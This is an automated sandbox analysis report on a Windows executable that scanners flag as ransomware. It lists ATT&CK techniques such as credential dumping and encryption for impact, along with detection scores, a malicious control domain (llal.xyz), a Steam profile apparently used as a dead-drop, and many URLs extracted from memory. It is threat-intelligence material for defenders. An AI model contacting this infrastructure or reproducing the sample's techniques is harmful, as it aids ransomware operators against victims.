Process Injection		Security Account Manager1
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS1
Process Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials22
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
OXoeX1Ii3x.exe53%VirustotalBrowse
OXoeX1Ii3x.exe68%ReversingLabsWin32.Ransomware.Generic
OXoeX1Ii3x.exe100%AviraTR/AVI.Ransom.faqrc
OXoeX1Ii3x.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d0%Avira URL Cloudsafe
https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842dy0%Avira URL Cloudsafe
https://community.fastly40%Avira URL Cloudsafe
https://llal.xyz/0%Avira URL Cloudsafe
https://llal.xyz0%Avira URL Cloudsafe
https://llal.xyzuser0%Avira URL Cloudsafe
https://api.steampowerW0%Avira URL Cloudsafe
https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d30%Avira URL Cloudsafe
https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842db0%Avira URL Cloudsafe
https://https://t.me/asdfghjrrewqqqqtfg/ujs/WorldHellostrwvfncexGostrbrCHbrGkunknownftpac/Up/gltype0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
steamcommunity.com
104.102.49.254
truefalse
    		high
    llal.xyz
    		188.114.96.3
    		truetrue
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842dtrue
      • Avira URL Cloud: safe
      		unknown
      https://steamcommunity.com/profiles/76561199619938930false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
          		high
          https://player.vimeo.comOXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://community.fastly4OXoeX1Ii3x.exe, 00000000.00000002.2505872324.000000000313A000.00000004.00000010.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://steamcommunity.com/profiles/76561199619938930/inventory/OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
              		high
              https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                		high
                https://steamcommunity.com/?subsection=broadcastsOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                  		high
                  https://store.steampowered.com/subscriber_agreement/OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                    		high
                    https://www.gstatic.cn/recaptcha/OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://steamcommunity.com/profiles/76561199619938930HSOXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033EE000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://steamcommunity.com/profiles/76561199619938930QCOXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000336E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://www.valvesoftware.com/legal.htmOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                            		high
                            https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                              		high
                              https://www.youtube.comOXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://steamcommunity.com/login/home/?goto=profiles%2F7656119961993893076561199619938930[1].htm.0.drfalse
                                  		high
                                  https://www.google.comOXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842dyOXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                      		high
                                      https://steamcommunity.com/profiles/76561199619938930ACOXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000336E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                          		high
                                          https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl76561199619938930[1].htm.0.drfalse
                                              		high
                                              https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                		high
                                                https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                  		high
                                                  https://s.ytimg.com;OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRiOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                      		high
                                                      https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                        		high
                                                        https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                          		high
                                                          https://community.fastly.steamstatic.com/OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://steam.tv/OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://steamcommunity.com/profiles/76561199619938930~OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                  		high
                                                                  http://store.steampowered.com/privacy_agreement/OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                    		high
                                                                    https://store.steampowered.com/points/shop/OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                      		high
                                                                      https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                        		high
                                                                        https://sketchfab.comOXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://lv.queniujq.cnOXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.youtube.com/OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://store.steampowered.com/privacy_agreement/OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                		high
                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://llal.xyz/OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://steamcommunity.com/profiles/76561199619938930yBOXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000336E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                        		high
                                                                                        https://www.google.com/recaptcha/OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://checkout.steampowered.com/OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://llal.xyzOXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://store.steampowered.com/;OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://store.steampowered.com/about/76561199619938930[1].htm.0.drfalse
                                                                                                		high
                                                                                                https://steamcommunity.com/my/wishlist/OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                    		high
                                                                                                    https://help.steampowered.com/en/OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                      		high
                                                                                                      https://steamcommunity.com/market/OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                        		high
                                                                                                        https://store.steampowered.com/news/OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                          		high
